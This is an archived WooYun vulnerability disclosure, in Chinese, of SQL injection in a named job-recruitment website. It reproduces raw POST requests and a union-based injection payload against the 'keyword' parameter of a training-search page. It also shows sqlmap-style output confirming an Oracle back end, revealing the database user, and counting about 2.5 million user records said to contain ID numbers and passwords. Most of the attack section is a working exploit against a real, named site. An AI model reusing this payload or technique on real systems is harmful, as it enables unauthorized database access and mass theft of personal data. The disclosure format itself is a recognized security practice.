乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
表示超过20个漏洞
POST注入类型,抓包
POST /person/logon.jsp?towhere=pic.jsp HTTP/1.1Host: www.job168.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.job168.com/Cookie: JSESSIONID=abceIe7DSCJHYf8Nv33-uConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 43POST /train/searchresult.jsp HTTP/1.1Host: www.job168.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.job168.com/train/searchresult.jspCookie: JSESSIONID=abceIe7DSCJHYf8Nv33-uConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 71course_type=B0116&school_loc=0115&mdate=15&keyword=11%27&im.x=28&im.y=9account=
直接顺利跑出数据
Place: POSTParameter: keyword Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: course_type=B0116&school_loc=0115&mdate=15&keyword=11' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(117)||CHR(101)||CHR(118)||CHR(58)||CHR(99)||CHR(81)||CHR(107)||CHR(113)||CHR(115)||CHR(79)||CHR(72)||CHR(114)||CHR(121)||CHR(100)||CHR(58)||CHR(99)||CHR(112)||CHR(106)||CHR(58), NULL FROM DUAL-- &im.x=28&im.y=9account=---[09:54:28] [INFO] testing Oracle[09:54:29] [INFO] confirming Oracle[09:54:30] [INFO] the back-end DBMS is Oracleweb application technology: Nginxback-end DBMS: Oracle[09:54:30] [INFO] fetching current usercurrent user: 'NFRC'
表就跑了3个表 因为要拆解,太慢了
GLOBAL_USERASSIGNINUEST
关键表250万用户信息
Database: NFRC+-------------+---------+| Table | Entries |+-------------+---------+| GLOBAL_USER | 2517362 |+-------------+---------+
泄漏的信息有身份证,帐号密码,姓名等等,这里就不帖了!
危害等级:无影响厂商忽略
忽略时间:2015-09-28 16:26
漏洞Rank:4 (WooYun评价)
暂无